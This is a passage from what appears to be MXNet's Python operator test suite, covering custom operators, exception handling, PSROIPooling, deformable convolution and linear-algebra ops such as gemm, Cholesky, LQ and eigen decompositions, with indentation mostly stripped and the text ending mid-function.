def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork on Windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test exception handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_device().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# For now there is only a GPU implementation
if default_device().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condition holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
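# Added illustrative sketch (not used by the test below): bilinear sampling at (h, w)
# mixes the four integer-neighbour values with weights given by the fractional parts,
# so its gradient w.r.t. (h, w) jumps whenever h or w crosses an integer grid line.
# That is why _validate_sample_location re-draws offsets that land too close to
# integer coordinates before running the numeric gradient check.
def _np_bilinear_sample(feat, h, w):
    h0, w0 = int(math.floor(h)), int(math.floor(w))
    h1, w1 = min(h0 + 1, feat.shape[0] - 1), min(w0 + 1, feat.shape[1] - 1)
    lh, lw = h - h0, w - w0
    return ((1 - lh) * (1 - lw) * feat[h0, w0] + (1 - lh) * lw * feat[h0, w1] +
            lh * (1 - lw) * feat[h1, w0] + lh * lw * feat[h1, w1])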
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the sampling locations fall on valid (differentiable) points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# For now there is only a GPU implementation
if default_device().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_device().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
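# Added note (illustrative only): per matrix, the mask constructed above is simply the
# lower-triangular ones matrix, i.e. np.tril(np.ones((m, m))) for lower=True and its
# transpose for lower=False; the one_hot/concat code just builds it symbolically.
def _np_triangle_mask(m, lower):
    mask = np.tril(np.ones((m, m)))
    return mask if lower else mask.T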
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
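# Added illustrative numpy analogue of the grouped outputs above (a sketch, not used by
# the tests): an LQ factorisation A = L * Q with orthonormal rows of Q can be obtained
# from the QR factorisation of A^T; then Q * Q^T = I and L * Q = A, which are the two
# identities the combined symbol is checked against (assuming rows(A) <= cols(A)).
def _np_gelqf_identities(a):
    q_t, r_t = np.linalg.qr(a.T)
    l_mat, q_mat = r_t.T, q_t.T
    return q_mat.dot(q_mat.T), l_mat.dot(q_mat)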
# NOTE: If we leave the unused output dangling, things break for dtype=np.float64:
# the backward gradient for the unused output then comes back as np.float32.
# The BlockGrad trick below works around this.
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
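# Helper: syevd returns (U, lambda) with the eigenvectors stored in the rows of U,
# so that A = U^T * diag(lambda) * U. The combined symbol outputs
# (U * U^T, U^T * diag(lambda) * U), which the tests compare against (I, A).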
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
    # Currently disabled on GPU as these tests need CUDA 8
    # while the MXNet builds use CUDA 7.5
if not (default_device() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
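# NumPy reference for the syevd forward pass: eigenvalues sorted in ascending
# order, eigenvectors stored as rows of u, and each eigenvector sign-normalized
# so that its largest-magnitude entry is positive (presumably matching the
# operator's deterministic sign convention).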
def _syevd_forward(a):
